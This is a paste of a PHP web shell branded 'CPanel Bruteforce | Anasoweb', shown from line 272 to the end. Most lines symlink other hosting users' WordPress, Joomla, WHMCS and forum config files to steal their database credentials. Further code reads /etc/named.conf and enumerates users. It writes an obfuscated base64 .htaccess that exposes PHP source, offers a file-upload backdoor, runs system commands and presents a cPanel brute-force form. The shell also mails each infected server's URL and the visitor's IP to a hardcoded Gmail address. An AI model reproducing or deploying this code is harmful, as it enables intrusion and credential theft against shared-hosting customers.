  272. symlink('/home3/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  273. symlink('/home3/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  274. symlink('/home3/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  275. symlink('/home3/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  276. symlink('/home3/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  277. symlink('/home3/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  278. symlink('/home3/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  279. symlink('/home3/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  280. symlink('/home3/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  281. symlink('/home3/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  282. symlink('/home3/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  283. symlink('/home3/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  284. symlink('/home3/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  285. symlink('/home3/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  286. symlink('/home3/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  287. symlink('/home3/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  288. symlink('/home3/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  289. symlink('/home3/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  290. symlink('/home3/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  291. symlink('/home3/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  292. symlink('/home3/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  293. symlink('/home3/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  294. symlink('/home3/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  295. symlink('/home3/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  296. symlink('/home3/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  297. symlink('/home3/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  298. symlink('/home3/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  299. symlink('/home3/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  300. symlink('/home3/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  301. symlink('/home3/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  302. symlink('/home3/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  303. symlink('/home3/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  304. symlink('/home3/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  305. symlink('/home3/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  306. symlink('/home3/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  307. symlink('/home3/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  308. symlink('/home3/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  309. symlink('/home3/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  310. symlink('/home4/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  311. symlink('/home4/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  312. symlink('/home4/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  313. symlink('/home4/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  314. symlink('/home4/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  315. symlink('/home4/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  316. symlink('/home4/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  317. symlink('/home4/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  318. symlink('/home4/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  319. symlink('/home4/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  320. symlink('/home4/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  321. symlink('/home4/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  322. symlink('/home4/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  323. symlink('/home4/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  324. symlink('/home4/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  325. symlink('/home4/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  326. symlink('/home4/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  327. symlink('/home4/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  328. symlink('/home4/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  329. symlink('/home4/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  330. symlink('/home4/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  331. symlink('/home4/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  332. symlink('/home4/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  333. symlink('/home4/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  334. symlink('/home4/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  335. symlink('/home4/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  336. symlink('/home4/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  337. symlink('/home4/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  338. symlink('/home4/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  339. symlink('/home4/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  340. symlink('/home4/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  341. symlink('/home4/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  342. symlink('/home4/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  343. symlink('/home4/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  344. symlink('/home4/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  345. symlink('/home4/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  346. symlink('/home4/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  347. symlink('/home4/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  348. symlink('/home4/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  349. symlink('/home4/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  350. symlink('/home4/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  351. symlink('/home4/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  352. symlink('/home5/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  353. symlink('/home5/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  354. symlink('/home5/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  355. symlink('/home5/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  356. symlink('/home5/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  357. symlink('/home5/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  358. symlink('/home5/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  359. symlink('/home5/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  360. symlink('/home5/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  361. symlink('/home5/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  362. symlink('/home5/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  363. symlink('/home5/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  364. symlink('/home5/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  365. symlink('/home5/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  366. symlink('/home5/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  367. symlink('/home5/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  368. symlink('/home5/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  369. symlink('/home5/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  370. symlink('/home5/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  371. symlink('/home5/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  372. symlink('/home5/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  373. symlink('/home5/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  374. symlink('/home5/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  375. symlink('/home5/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  376. symlink('/home5/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  377. symlink('/home5/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  378. symlink('/home5/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  379. symlink('/home5/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  380. symlink('/home5/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  381. symlink('/home5/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  382. symlink('/home5/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  383. symlink('/home5/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  384. symlink('/home5/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  385. symlink('/home5/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  386. symlink('/home5/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  387. symlink('/home5/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  388. symlink('/home5/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  389. symlink('/home5/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  390. symlink('/home5/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  391. symlink('/home5/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  392. symlink('/home5/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  393. symlink('/home5/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  394. symlink('/home6/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  395. symlink('/home6/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  396. symlink('/home6/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  397. symlink('/home6/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  398. symlink('/home6/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  399. symlink('/home6/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  400. symlink('/home6/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  401. symlink('/home6/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  402. symlink('/home6/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  403. symlink('/home6/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  404. symlink('/home6/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  405. symlink('/home6/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  406. symlink('/home6/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  407. symlink('/home6/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  408. symlink('/home6/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  409. symlink('/home6/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  410. symlink('/home6/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  411. symlink('/home6/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  412. symlink('/home6/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  413. symlink('/home6/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  414. symlink('/home6/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  415. symlink('/home6/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  416. symlink('/home6/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  417. symlink('/home6/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  418. symlink('/home6/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  419. symlink('/home6/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  420. symlink('/home6/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  421. symlink('/home6/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  422. symlink('/home6/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  423. symlink('/home6/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  424. symlink('/home6/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  425. symlink('/home6/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  426. symlink('/home6/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  427. symlink('/home6/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  428. symlink('/home6/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  429. symlink('/home6/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  430. symlink('/home6/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  431. symlink('/home6/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  432. symlink('/home6/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  433. symlink('/home6/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  434. symlink('/home6/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  435. symlink('/home6/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  436. symlink('/home7/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  437. symlink('/home7/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  438. symlink('/home7/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  439. symlink('/home7/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  440. symlink('/home7/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  441. symlink('/home7/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  442. symlink('/home7/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  443. symlink('/home7/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  444. symlink('/home7/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  445. symlink('/home7/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  446. symlink('/home7/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  447. symlink('/home7/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  448. symlink('/home7/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  449. symlink('/home7/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  450. symlink('/home7/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  451. symlink('/home7/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  452. symlink('/home7/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  453. symlink('/home7/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  454. symlink('/home7/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  455. symlink('/home7/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  456. symlink('/home7/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  457. symlink('/home7/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  458. symlink('/home7/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  459. symlink('/home7/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  460. symlink('/home7/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  461. symlink('/home7/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  462. symlink('/home7/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  463. symlink('/home7/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  464. symlink('/home7/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  465. symlink('/home7/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  466. symlink('/home7/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  467. symlink('/home7/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  468. symlink('/home7/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  469. symlink('/home7/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  470. symlink('/home7/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  471. symlink('/home7/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  472. symlink('/home7/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  473. symlink('/home7/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  474. symlink('/home7/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  475. symlink('/home7/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  476. symlink('/home7/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  477. symlink('/home7/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  478. }
  479. $d0mains = @file("/etc/named.conf");
  480. if ($d0mains) {
  481. mkdir($fn);
  482. chdir($fn);
  483. foreach ($d0mains as $d0main) {
  484. if (eregi("zone", $d0main)) {
  485. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  486. flush();
  487. if (strlen(trim($domains[1][0])) > 2) {
  488. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
  489. syml($user['name'], $domains[1][0]);
  490. }
  491. }
  492. }
  493. echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><center>[Done] : <span style='color:" . $color[0] . ";'>Successfull, </span> <a href=$fn/ style='text-decoration:none;'><input type='button' value='Go !'></a> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  494. } else {
  495. mkdir($fn);
  496. chdir($fn);
  497. $temp = "";
  498. $val1 = 0;
  499. $val2 = 1000;
  500. for (;$val1 <= $val2;$val1++) {
  501. $uid = @posix_getpwuid($val1);
  502. if ($uid) $temp.= join(':', $uid) . "
  503. ";
  504. }
  505. echo '<br/>';
  506. $temp = trim($temp);
  507. $file5 = fopen("test.txt", "w");
  508. fputs($file5, $temp);
  509. fclose($file5);
  510. $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxhaW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFpbiAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  511. ';
  512. $file = fopen(".htaccess", "w+");
  513. $write = fwrite($file, base64_decode($htaccess));
  514. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  515. while (!feof($file)) {
  516. $s = fgets($file);
  517. $matches = array();
  518. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  519. $matches = str_replace("home/", "", $matches[1]);
  520. if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
  521. syml($matches, $matches);
  522. }
  523. fclose($file);
  524. echo "</table>";
  525. unlink("test.txt");
  526. echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><center>[Done] : <span style='color:" . $color[0] . ";'>Successfull, </span> <a href=$fn/ style='text-decoration:none;'><input type='button' value='Go !'></a> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  527. }
  528. exit;
  529. }
  530. ?>
  531. <center><?
  532. if(isset($_GET["epb"])){
  533. echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
  534. echo"<br><font color=#FFFFFF>[dir]".getcwd()."[/dir]";
  535. echo"<form method=post enctype=multipart/form-data>";
  536. echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
  537. if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  538. echo"<b>Success</b>-->".$_FILES["f"]["name"];
  539. }
  540. else{
  541. echo"<b>Failed";}}}?></center>
  542. <form method="POST" target="_blank">
  543. <input name="page" type="hidden" value="find">
  544. <table width="550" cellpadding="3" cellspacing="1" align="center" style="border:3px solid <?php echo $color[0]; ?>;" border=1>
  545. <tr>
  546. <td valign="top" colspan="6" style="border-bottom:2px solid <?php echo $color[0]; ?>;padding:10px;"><center><span style="font-family: Verdana;font-size:30px;font-weight:bold;text-shadow: <?php echo $color[0]; ?> 0.0em 0.0em 0.2em;">CPanel Bruteforce | Anasoweb</span><br>
  547. </center></td>
  548. </tr>
  549. <tr>
  550. <td valign="top" style="width: 200px;"><span class="label">Safe Mode</span></td>
  551. <td valign="top" colspan="5"><span class="label">
  552. <?php
  553. $safe_mode = ini_get('safe_mode');
  554. if ($safe_mode == '1') {
  555. echo 'ON';
  556. } else {
  557. echo 'OFF';
  558. }
  559. ?>
  560. </span>
  561. </td>
  562. </tr>
  563. </form>
  564. <tr>
  565. <td valign="top"><span class="label">Disable Function</span></td>
  566. <td valign="top" colspan="5">
  567. <form method="POST" target="_blank">
  568. <input name="matikan" type="hidden" value="sekatan">
  569. <?php
  570. if ('' == ($func = @ini_get('disable_functions'))) {
  571. echo "<font color='" . $color[0] . "' style='position:absolute;font-size:13px;'>No Security for Function</font>";
  572. echo '<tr><td valign="top"><span class="label">Bypass</span></td><td valign="top" colspan="5"><font color="' . $color[0] . '" style="font-size:13px;">Success</font></td></tr>';
  573. } else {
  574. echo '<script>alert(" Please See Below And Press
  575. --->| Click Here First! |<--- ");</script>';
  576. echo "<font color=#FF0000 style='position:relatif;font-size:13px;'>$func</font>";
  577. echo '<tr><td valign="top"><span class="label">Bypass</span></td><td valign="top" colspan="5"><input type="submit" value="Click Here First!"></td></tr>';
  578. }
  579. ?>
  580. <?php $ip = getenv("REMOTE_ADDR");
  581. $hostname = gethostbyaddr($ip);
  582. $bilsmg = "Link Mailer : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."\r\n";
  583. $bilsnd ="thexkoreanboss@gmail.com"; ///Your E4ail Here
  584. $bilsub = "New CPCRACKER Uploaded $ip";
  585. $bilhead = "From: CPCRACKER";
  586. $bilhead .= $_POST['eMailAdd']."\n";
  587. $bilhead .= "MIME-Version: 1.0\n";
  588. $arr=array($bilsnd, $IP);
  589. foreach ($arr as $bilsnd)
  590. mail($bilsnd,$bilsub,$bilsmg,$bilhead,$message); ?></form></td>
  591. <form method="POST" target="_blank">
  592. <input name="mendapatkan" type="hidden" value="passwd">
  593. <tr>
  594. <td valign="top"><span class="label">Get Config</span></td>
  595. <td valign="top"><input size="35" name="foldername" type="text" value="Anasoweb"> <input type="submit" value="Submit"></td>
  596. </td>
  597. </tr>
  598. </form>
  599. <form method="POST" target="_blank">
  600. <input name="pass" type="hidden" value="password">
  601. <tr>
  602. <td valign="top"><span class="label">Get Passlist</span></td>
  603. <td valign="top"><input size="35" name="url" type="text" value="url_of_config"> <input type="submit" value="Submit"></td>
  604. </td>
  605. </tr>
  606. </form>
  607. <tr>
  608. <td valign="top">
  609. <span class="label">Userlist</span></td>
  610. <td valign="top" colspan="5"><textarea cols="40" rows="7" name="usernames"><?php system('ls /var/mail'); ?></textarea></td>
  611. </tr>
  612. <tr>
  613. <td valign="top">
  614. <span class="label">Passlist</span></td>
  615. <td valign="top"colspan="5"><textarea cols="40" rows="7" name="passwords"></textarea></td>
  616. </tr>
  617. <tr>
  618. <td valign="top">
  619. <span class="label">Type</span></td>
  620. <td valign="top" colspan="5">
  621. <input type="radio" name="type" value="simple" checked="checked"><span class="label">Simple</span>
  622. <input type="radio" name="type" value="passwd"><span class="label">/etc/passwd</span>
  623. </td>
  624. </tr>
  625. <tr>
  626. <td valign="top" colspan="6"><center><input type="submit" value="Submit"></center></td>
  627. </tr>
  628. </form>
  629. <tr>
  630. <td valign="top" colspan="6" style="border-top:2px solid <?php echo $color[0]; ?>;"><center><font face="Verdana" color="#e1e1e1" size="2" style="margin:7px;">Allright Reserved &copy; Anasoweb |www.facebook.Com/anasoweb1996</font></center></td>
  631. </tr>
  632. </table>
  633. </body>
  634. </html>
Add Comment
Please, Sign In to add comment